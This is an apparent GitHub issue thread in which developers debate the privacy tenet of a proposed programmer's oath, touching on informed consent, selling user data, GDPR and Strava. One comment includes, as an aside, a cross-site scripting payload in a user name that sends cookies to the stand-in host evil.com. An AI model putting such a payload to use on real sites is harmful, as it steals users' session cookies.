Privacy is not just about the world, it is about you, too.

[anfedorov]

I will respect the privacy of my users, for their information is not disclosed to me that the world may know.

Their information is not disclosed to you. You may have access to it, but it was most likely disclosed to a system you wrote for the purpose of fulfilling the features they understood the system to offer them. They probably have relatively reasonable expectations that their data is being handled by a system, not by humans, and violating that expectation is wrong.

[mo-g]

This is a very fair point, and follows things like ITIL rules and basic security practice - Development should be done on a system without live data.

That said, there will always be a need to disclose data to programmers in order to fix exceptional cases, and this Tenet should stand in those cases. I would be in favour of not disclosed to me or to my software or some such as that fixes this issue without opening a 'loophole'.

[Widdershin]

Good point @anfedorov, the not disclosed to me phrasing is straight from the Modern Hippocratic Oath, but makes far less sense in this context.

[anfedorov]

Ah, I see, in the context of doctor + patient:

I will respect the privacy of my patients, for their problems are not disclosed to me that the world may know.

There's definitely exceptions to be had for looking at someone who appears to be malicious (e.g. Mr. />"'<script>img.src = "http://evil.com/?" + window.cookies), or for analytics like "what % of x.foo has .len > 10"? not completely sure on how to best strike the balance, but would be curious to think more.

[vassudanagunta]

I would add something along the lines of "I will never collect data from users except in their interest. I will never collect data from users that I do not honestly need to serve them. I will always be proactively transparent with users about what data I keep about them, and how it gets used, and to whom it gets disclosed. I will give users the the ability to delete all of the data I have about them (except as I am required by law to keep)."

[anfedorov]

What if collecting user data and selling it is how you finance your business and it's in the interest of users for you to have a financed business, instead of going to work on something else?

…

On Mon, Mar 5, 2018 at 2:55 PM, Vas Sudanagunta ***@***.***> wrote: I would add something along the lines of "I will never collect data from users except in their interest. I will never collect data from users that I do not honestly need to serve them. I will always be *proactively* transparent with users about what data I keep about them, and how it gets used, and to whom it gets disclosed. I will give users the the ability to delete *all* of the data I have about them (except as I am required by law to keep)." — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#24 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAAmXHpSOlUE_VhedPeYHy2WiYyvT6fUks5tbcJigaJpZM4SUZbW> .

[pachunka]

What if collecting user data and selling it is how you finance your business

Selling data and failing to respect privacy aren't the same thing. If I sign up to a recruiter, they effectively sell my information onto interested hiring parties for me, because I don't have the same connections. Might be a weird example, but it sprang to mind as a legitimate use-case.

On the other hand, if I give out my email address to receive a newsletter, and that gets sold onto some spam-house, then this tenet of the oath wasn't met.

I'm sure this is discussed-to-death elsewhere, but I'll throw in where I think the hard-to-draw line is on privacy, as a user: It's "Would I be negatively surprised at how my data is used?"

Nearly every social-site that asks you for an email address tells you up-front whether it will be shown publicly. They know people care about that. For an email-address to show up in public that I thought was private, I'm going to be pretty negatively surprised.

On the other hand, if a site publishes a blog-entry that says 50% of its users use a certain browser, and they quietly got that from my-and-everyone-else's user-agent string, I'm not gonna be shocked. (But who knows, maybe somebody's user-agent is TopSecretBrowserYouDidn'tKnowWasBeingWorkedOn-v2 and they don't like that being handed to the company-blogger, or the drafts section of whatever 3rd-party blogging platform they use).

In any case - for what it's worth, in my mind, respecting privacy means you don't get to do something with a user's data that they wouldn't be OK with themselves. And you don't get to guess what's OK; you ask: like asking if an email address should be public or private.

and it's in the interest of users for you to have a financed business

If its business model is privacy violation, it isn't.

[anfedorov]

I was saying "in the interests of the users" is probably too broad — nearly anything has some element of being "in the interests of the users" if the alternative is "I take this product offline and go do something else with my time". A measure of "negative surprise" seems subjective and concepts of "privacy" seem highly variable between individuals and probably not a good part of an oath. The User Agent is a good example. What Strava did [1] seems like another — were those engineers in violation of the oath because of their user's surprise? What if the engineers expected people on top secret deployments not to upload their locations to a non-classified system without looking at the privacy settings? The initial reaction aside, I'm open to being convinced otherwise on the "surprise" definition. Similarly, GDPR [2] appears to have a strong foundation in "informed consent" — people need to understand what will happen to their data when they hand it over and it's the developer's legal and ethical obligation to inform them of all uses and also allow them to change their minds. Is there a more concise way of saying that? 1. https://en.wikipedia.org/wiki/Strava#Controversies 2. https://techblog.bozho.net/gdpr-practical-guide-developers/

…

On Wed, Mar 7, 2018 at 3:32 AM, Pachunka Akbar Lamborghini < ***@***.***> wrote: What if collecting user data and selling it is how you finance your business Selling data and failing to respect privacy aren't the same thing. If I sign up to a recruiter, they effectively sell my information onto interested hiring parties *for me*, because I don't have the same connections. Might be a weird example, but it sprang to mind as a legitimate use-case. On the other hand, if I give out my email address to receive a newsletter, and that gets sold onto some spam-house, then this tenet of the oath wasn't met. I'm sure this is discussed-to-death elsewhere, but I'll throw in where I think the hard-to-draw line is on privacy, as a user: It's "Would I be negatively surprised at how my data is used?" Nearly every social-site that asks you for an email address tells you up-front whether it will be shown publicly. They know people care about that. For an email-address to show up in public that I thought was private, I'm going to be pretty negatively surprised. On the other hand, if a site publishes a blog-entry that says 50% of its users use a certain browser, and they quietly got that from my-and-everyone-else's user-agent string, I'm not gonna be shocked. (But who knows, maybe somebody's user-agent is TopSecretBrowserYouDidn'tKnowWasBeingWorkedOn-v2 and they don't like that being handed to the company-blogger, or the drafts section of whatever 3rd-party blogging platform they use). In any case - for what it's worth, in my mind, respecting privacy means you don't get to do something with a user's data that they wouldn't be OK with themselves. And you don't get to guess what's OK; you ask: like asking if an email address should be public or private. and it's in the interest of users for you to have a financed business If its business model is privacy violation, it isn't. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#24 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAAmXDdcNoFkiAompEqETyDxQ9EG3P3kks5tb8VLgaJpZM4SUZbW> .

[mo-g]

But who knows, maybe somebody's user-agent is TopSecretBrowserYouDidn'tKnowWasBeingWorkedOn-v2

That's literally been the source of a number of product leaks. Mostly at Apple, since everyone else has to crow from the rooftops throughout development in order to secure capital and prevent management intervention.

In any case - for what it's worth, in my mind, respecting privacy means you don't get to do something with a user's data that they wouldn't be OK with themselves. And you don't get to guess what's OK; you ask: like asking if an email address should be public or private.

This is a good summary of the issue.

@anfedorov That's a tricky one. It's also hard to conceive of an example of this, so if you could provide one, I'd appreciate it. There is a growing body of evidence that points to our prime example of that practice, social networks - being directly harmful to society through their own manipulations (facebook) and through the manipulations of users (twitter) and through the complicit or involuntary wholesale absorption of their held data into espionage data-archives (fsb, cia, gchq, etc).